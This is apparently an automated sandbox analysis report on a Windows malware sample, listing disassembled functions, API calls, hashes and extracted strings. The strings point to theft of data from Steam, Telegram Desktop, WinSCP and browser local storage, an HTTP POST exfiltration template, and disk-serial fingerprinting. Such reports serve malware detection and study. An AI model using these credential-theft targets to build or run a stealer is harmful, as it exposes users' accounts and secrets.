                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$ErrorLast$Value$CryptRandom
                                                                                                                                              • String ID: Bj0Y$Invalid$`async fn` resumed after completion$cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs
                                                                                                                                              • API String ID: 1996510134-2244339143
                                                                                                                                              • Opcode ID: 2725746a309ccbdab0fde705be508091761fde0b742788d8cff5d46dac4d75d0
                                                                                                                                              • Instruction ID: 8f7d463ca79ad4b1ad9e432b0c0508f665c254c7e4e5cf50c660e4a81ea2b633
                                                                                                                                              • Opcode Fuzzy Hash: 2725746a309ccbdab0fde705be508091761fde0b742788d8cff5d46dac4d75d0
                                                                                                                                              • Instruction Fuzzy Hash: EE338D71A487829FD725CF24D844BABFBE1BFC9304F04892DE88997250E730A955CF96
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025A0225 Relevance: 77.0, APIs: 44, Strings: 6, Instructions: 2020memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,0257CDE7), ref: 025A0462
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A047B
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A060C
                                                                                                                                                • Part of subcall function 0257FB9E: HeapFree.KERNEL32(00000000,?), ref: 0257FBD0
                                                                                                                                                • Part of subcall function 0257FB9E: HeapFree.KERNEL32(00000000,00000000), ref: 0257FBDF
                                                                                                                                              • HeapFree.KERNEL32(00000000,0257CDE7), ref: 025A06B0
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A06C9
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A07AF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A0C60
                                                                                                                                                • Part of subcall function 025CFEC0: HeapFree.KERNEL32(00000000,?), ref: 025D0037
                                                                                                                                                • Part of subcall function 025CFEC0: HeapFree.KERNEL32(00000000,?), ref: 025D004C
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A0CE0
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A0F10
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 025A0F85
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A0FE5
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A10A7
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A10F1
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A13F9
                                                                                                                                                • Part of subcall function 0258172D: HeapFree.KERNEL32(00000000,?,?,?,?,?,025BC142), ref: 02581775
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000), ref: 025A111E
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A12D1
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A14FC
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A1592
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A1695
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A1700
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A1724
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A17A8
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000004), ref: 025A17E8
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A1807
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A1827
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A1840
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A1A0F
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A1AA5
                                                                                                                                              • HeapFree.KERNEL32(00000000,-0000000C), ref: 025A1B12
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A254D
                                                                                                                                                • Part of subcall function 025617D0: HeapFree.KERNEL32(00000000,?), ref: 02561998
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A23D7
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A2413
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A2432
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A244B
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A246A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A2483
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A24C5
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 025A24D3
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A2504
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A2572
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A2591
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A25AA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID: APPDATA$Invalid$e$l$q$s
                                                                                                                                              • API String ID: 1910495013-1432503283
                                                                                                                                              • Opcode ID: 528228734ed69470e5e45471a5ffb7bb00cfa8aca8135adfa56b2f329fa2d30a
                                                                                                                                              • Instruction ID: 69b6be6b611e0f3474e2447873f1719819089ad9d67aff003e9a42e497ccb7f2
                                                                                                                                              • Opcode Fuzzy Hash: 528228734ed69470e5e45471a5ffb7bb00cfa8aca8135adfa56b2f329fa2d30a
                                                                                                                                              • Instruction Fuzzy Hash: 3C2345B09087818FD735CF18C491B9BBBE6BFD9304F14891DE98987290E771A985CF86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0258C38E Relevance: 68.9, APIs: 37, Strings: 8, Instructions: 1390memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258C4D3
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258C4F2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258C866
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258C988
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CAAA
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CAD6
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CAF6
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CBE7
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CC06
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CC21
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CC36
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CC4B
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CC60
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CCB2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CCD1
                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0258CD82
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CDA0
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D092
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D3DB
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D46F
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D488
                                                                                                                                                • Part of subcall function 0257FB9E: HeapFree.KERNEL32(00000000,?), ref: 0257FBD0
                                                                                                                                                • Part of subcall function 0257FB9E: HeapFree.KERNEL32(00000000,00000000), ref: 0257FBDF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D713
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CE30
                                                                                                                                                • Part of subcall function 02596AA8: HeapFree.KERNEL32(00000000,?), ref: 02596AD5
                                                                                                                                                • Part of subcall function 02596AA8: HeapFree.KERNEL32(00000000,00000001), ref: 02596AE4
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258CE49
                                                                                                                                              • HeapFree.KERNEL32(00000000,0257CDE7), ref: 0258D126
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D13F
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D232
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D24B
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D268
                                                                                                                                                • Part of subcall function 025CA3F0: HeapFree.KERNEL32(00000000,00000000), ref: 025CA5D0
                                                                                                                                                • Part of subcall function 025CA3F0: HeapFree.KERNEL32(00000000,?), ref: 025CA5E1
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D77E
                                                                                                                                                • Part of subcall function 025617D0: HeapFree.KERNEL32(00000000,?), ref: 02561998
                                                                                                                                                • Part of subcall function 025CA3F0: HeapFree.KERNEL32(00000000,00000000), ref: 025CA615
                                                                                                                                                • Part of subcall function 025CA3F0: HeapFree.KERNEL32(00000000,?), ref: 025CA626
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D7EE
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D80B
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D82A
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000), ref: 0258D8F5
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D987
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D9A4
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0258D9C2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID: !$)$APPDATA$C:\Program Files (x86)\SteamC:\Program Files (x86)\Steam\config\Telegram Desktop\tdata$Invalid$a Display implementation returned an error unexpectedly$c\winscp.rs$grBH
                                                                                                                                              • API String ID: 3298025750-3594040642
                                                                                                                                              • Opcode ID: 3a8e526219bccd3efbb93d47a7ce88ccd429db6fbb7fad953872aaba3135cd76
                                                                                                                                              • Instruction ID: 831f6e0786884bc4684cac80cf49df6196d1d1a2643041c40af7687212981086
                                                                                                                                              • Opcode Fuzzy Hash: 3a8e526219bccd3efbb93d47a7ce88ccd429db6fbb7fad953872aaba3135cd76
                                                                                                                                              • Instruction Fuzzy Hash: 2ED229719083419FD725DF24C484BAAFBE2BFC8304F14891DE98997290D7B1A999CF86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0257B695 Relevance: 54.8, APIs: 26, Strings: 10, Instructions: 759memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257B78C
                                                                                                                                              • GetLastError.KERNEL32 ref: 0257BA1A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257BFD4
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257BFED
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257C006
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257C01F
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257C038
                                                                                                                                              • GetLastError.KERNEL32 ref: 0257C05E
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257C091
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000), ref: 0257C0BF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257C124
                                                                                                                                              • GetLastError.KERNEL32 ref: 0257C15C
                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000), ref: 0257C1A7
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 0257C1D6
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000001), ref: 0257C1F9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$ErrorLast
                                                                                                                                              • String ID: //:p$//:p$POSTHTTP/1.1Content-Type: application/json$`async fn` resumed after completion$http$http$ptth$ptth$s://$s://
                                                                                                                                              • API String ID: 2332451156-3283316195
                                                                                                                                              • Opcode ID: 468b8f51c6c53aa3256e8df472c3ca9eb2a9b8aeae178165e9414778f5a5f47e
                                                                                                                                              • Instruction ID: f8776de0e1102f034bcf117bdfffd35d8ef3c2e472af959d056bcdd2d1e78f9e
                                                                                                                                              • Opcode Fuzzy Hash: 468b8f51c6c53aa3256e8df472c3ca9eb2a9b8aeae178165e9414778f5a5f47e
                                                                                                                                              • Instruction Fuzzy Hash: AC629F70644342DFD765CF24D844BAABBE1BF84308F04892DE988DB291EB31D895CF96
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025B72D7 Relevance: 33.9, APIs: 15, Strings: 4, Instructions: 615memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025B83FC
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025B8BF6
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025B9082
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025B9147
                                                                                                                                              Strings
                                                                                                                                              • assertion failed: output_position <= output.len(), xrefs: 025B9316
                                                                                                                                              • assertion failed: step != 0, xrefs: 025B93BC
                                                                                                                                              • called `Result::unwrap()` on an `Err` value, xrefs: 025B9412
                                                                                                                                              • Invalid, xrefs: 025B92CA, 025B9389
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID: Invalid$assertion failed: output_position <= output.len()$assertion failed: step != 0$called `Result::unwrap()` on an `Err` value
                                                                                                                                              • API String ID: 3298025750-1422663253
                                                                                                                                              • Opcode ID: c08e4f8ddb0fcb41c58042be634559c60decc6de5cc2fe229be292bb6c3eac54
                                                                                                                                              • Instruction ID: 937af9f630f861c76d1c22b4cacb41437cbb8b01ca02bd09c0797b47175fc7ef
                                                                                                                                              • Opcode Fuzzy Hash: c08e4f8ddb0fcb41c58042be634559c60decc6de5cc2fe229be292bb6c3eac54
                                                                                                                                              • Instruction Fuzzy Hash: 3B42B171A083419FD726DF24C480A9BFBE6BFC9304F14895EE58A97291D770E845CF8A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0040A130 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 223comCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetVersionExA.KERNEL32(?,00000000,00446FF0,?), ref: 0040A15F
                                                                                                                                              • CoCreateInstance.OLE32(00437030,00000000,00000001,00437040,?), ref: 0040A183
                                                                                                                                              • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000006,00000003,00000000,00000020), ref: 0040A1BF
                                                                                                                                              Strings
                                                                                                                                              • SELECT SerialNumber FROM Win32_PhysicalMedia WHERE TAG='\\\\.\\PHYSICALDRIVE3', xrefs: 0040A209
                                                                                                                                              • SELECT SerialNumber FROM Win32_PhysicalMedia WHERE TAG='\\\\.\\PHYSICALDRIVE1', xrefs: 0040A1E3
                                                                                                                                              • SELECT SerialNumber FROM Win32_PhysicalMedia WHERE TAG='\\\\.\\PHYSICALDRIVE0', xrefs: 0040A1D0
                                                                                                                                              • WQL, xrefs: 0040A213
                                                                                                                                              • SELECT SerialNumber FROM Win32_PhysicalMedia WHERE TAG='\\\\.\\PHYSICALDRIVE2', xrefs: 0040A1F6
                                                                                                                                              • ROOT\CIMV2, xrefs: 0040A1A0
                                                                                                                                              • SerialNumber, xrefs: 0040A26B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: BlanketCreateInstanceProxyVersion
                                                                                                                                              • String ID: ROOT\CIMV2$SELECT SerialNumber FROM Win32_PhysicalMedia WHERE TAG='\\\\.\\PHYSICALDRIVE0'$SELECT SerialNumber FROM Win32_PhysicalMedia WHERE TAG='\\\\.\\PHYSICALDRIVE1'$SELECT SerialNumber FROM Win32_PhysicalMedia WHERE TAG='\\\\.\\PHYSICALDRIVE2'$SELECT SerialNumber FROM Win32_PhysicalMedia WHERE TAG='\\\\.\\PHYSICALDRIVE3'$SerialNumber$WQL
                                                                                                                                              • API String ID: 4052488553-668480656
                                                                                                                                              • Opcode ID: 2f43b8abd95bdce89a6337ee62f48717bf7de744291fe96b5a40e21d1573a07e
                                                                                                                                              • Instruction ID: f8abb40f569aaa07a23fa9f41c399833c975962cf1a17763c5e18912e3785d52
                                                                                                                                              • Opcode Fuzzy Hash: 2f43b8abd95bdce89a6337ee62f48717bf7de744291fe96b5a40e21d1573a07e
                                                                                                                                              • Instruction Fuzzy Hash: 00718C71640318ABCB20DF95CC48EEE3BB9FF49B54F20056AF919D7290C3799845CBA9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 02577754 Relevance: 21.5, APIs: 13, Strings: 1, Instructions: 485memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578000
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578019
                                                                                                                                                • Part of subcall function 025C6A20: SetLastError.KERNEL32(00000000), ref: 025C6AE3
                                                                                                                                                • Part of subcall function 025C6A20: GetLastError.KERNEL32 ref: 025C6AF8
                                                                                                                                                • Part of subcall function 025C6A20: GetLastError.KERNEL32 ref: 025C6B0A
                                                                                                                                                • Part of subcall function 025C6A20: HeapFree.KERNEL32(00000000,00000002), ref: 025C6B80
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02578508
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257858A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025785DC
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025786AF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025786CC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$ErrorLast
                                                                                                                                              • String ID: `async fn` resumed after completion
                                                                                                                                              • API String ID: 2332451156-507674517
                                                                                                                                              • Opcode ID: cfa46201193adb776f493bcbb43c7011bef27aecd89b113c212518ba097d8b2e
                                                                                                                                              • Instruction ID: 2b8454c5b78f2dd40dcbfedcea92cb83bcda5a728af3faad39df0aedf03a157b
                                                                                                                                              • Opcode Fuzzy Hash: cfa46201193adb776f493bcbb43c7011bef27aecd89b113c212518ba097d8b2e
                                                                                                                                              • Instruction Fuzzy Hash: 8F32D170A44742DFD725CF24C884BAAFBE2BF89304F04862DD59C9B251DB70A854DF96
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025C02D0 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 272filenativesynchronizationCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetStdHandle.KERNEL32 ref: 025C0307
                                                                                                                                              • GetLastError.KERNEL32 ref: 025C0316
                                                                                                                                              • GetConsoleMode.KERNEL32(00000000,?), ref: 025C0354
                                                                                                                                              • NtWriteFile.NTDLL ref: 025C03DF
                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 025C03EF
                                                                                                                                              • RtlNtStatusToDosError.NTDLL ref: 025C0472
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 025C067A
                                                                                                                                              Strings
                                                                                                                                              • called `Result::unwrap()` on an `Err` value, xrefs: 025C0634
                                                                                                                                              • Invalid, xrefs: 025C059B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorHandle$CloseConsoleFileLastModeObjectSingleStatusWaitWrite
                                                                                                                                              • String ID: Invalid$called `Result::unwrap()` on an `Err` value
                                                                                                                                              • API String ID: 3090192319-3400594596
                                                                                                                                              • Opcode ID: c6afcc8765b6eb20b382de2fe1646282240d89365e3df07ce24e392624448a11
                                                                                                                                              • Instruction ID: b57f3a1bf8fcad6775563a3b5b27c007c1248198da6c0b3c2c6692914da113eb
                                                                                                                                              • Opcode Fuzzy Hash: c6afcc8765b6eb20b382de2fe1646282240d89365e3df07ce24e392624448a11
                                                                                                                                              • Instruction Fuzzy Hash: C3B18DB0A04249DFDF10CFA4C8847EEBFB5BF44704F24841DE856AB281E775A989CB65
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025A3224 Relevance: 12.7, APIs: 4, Strings: 4, Instructions: 704COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • nown, xrefs: 025A435E
                                                                                                                                              • top\Local Storage\, xrefs: 025A330E
                                                                                                                                              • ;rn, xrefs: 025A3F92
                                                                                                                                              • cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs, xrefs: 025A4515
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs$nown$top\Local Storage\$;rn
                                                                                                                                              • API String ID: 0-1636215252
                                                                                                                                              • Opcode ID: 15458addc6cc74e10d8e99bbe1a9ba6def92089331e69ccdb99d4a0f8679d0ad
                                                                                                                                              • Instruction ID: f3ef5603ee451fbe31cbe8849a4a575d9d89ff371bacf8974102e971737d1af8
                                                                                                                                              • Opcode Fuzzy Hash: 15458addc6cc74e10d8e99bbe1a9ba6def92089331e69ccdb99d4a0f8679d0ad
                                                                                                                                              • Instruction Fuzzy Hash: 72627A71908382CFD724CF28C49179AFBE1BFC9304F158A6EE89997351DB70A945CB86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025CF340 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 418COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 025C0C80: TlsGetValue.KERNEL32(00000000,?,025CF3A0), ref: 025C0C90
                                                                                                                                              • AcquireSRWLockShared.KERNEL32(02620AF4), ref: 025CF3FE
                                                                                                                                              • ReleaseSRWLockShared.KERNEL32(02620AF4), ref: 025CF5A2
                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(?), ref: 025CF7F0
                                                                                                                                                • Part of subcall function 025BF580: HeapFree.KERNEL32(00000000,00000000,?,025CF991), ref: 025BF59C
                                                                                                                                                • Part of subcall function 025BF580: HeapFree.KERNEL32(00000000,?,?,025CF991), ref: 025BF5B6
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Lock$FreeHeapReleaseShared$AcquireExclusiveValue
                                                                                                                                              • String ID: Box<dyn Any><unnamed>$Invalid$cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs
                                                                                                                                              • API String ID: 1439667220-2178555723
                                                                                                                                              • Opcode ID: 1e17261340cd820c7bca7fd5caa5fa59d2bec53525ba24ef7e867814adf92444
                                                                                                                                              • Instruction ID: 16c31f649e209e0fe7334d6413f17862af8d2de961258428bc58fceaccf30149
                                                                                                                                              • Opcode Fuzzy Hash: 1e17261340cd820c7bca7fd5caa5fa59d2bec53525ba24ef7e867814adf92444
                                                                                                                                              • Instruction Fuzzy Hash: 880253B0504B418FE734CF65C584753BBE2BB45308F24891ED89A87B82E7B6F448CBA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025C0690 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 249COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00001000,?,?,FFFFFFFF,?,025C04CA,?,?), ref: 025C06FA
                                                                                                                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,00000000,?,?,FFFFFFFF,?,025C04CA,?), ref: 025C0727
                                                                                                                                              • WriteConsoleW.KERNEL32(?,?,00000001,?,00000000,?,?,00000000,00000000,00000000,?,?,FFFFFFFF,?,025C04CA,?), ref: 025C0775
                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,FFFFFFFF,?,025C04CA,?), ref: 025C0993
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ConsoleWrite$ByteCharErrorLastMultiWide
                                                                                                                                              • String ID: Invalid$error_len
                                                                                                                                              • API String ID: 3036337926-3343129532
                                                                                                                                              • Opcode ID: 7932a7986847aa983057a8fbaf68b44f35c52c60a6344a4e009c62235e45fccc
                                                                                                                                              • Instruction ID: dabf49042b6ec4b89ce32cd2daa69b61abfa8041e1ba5291d6e5b8cd77c7be51
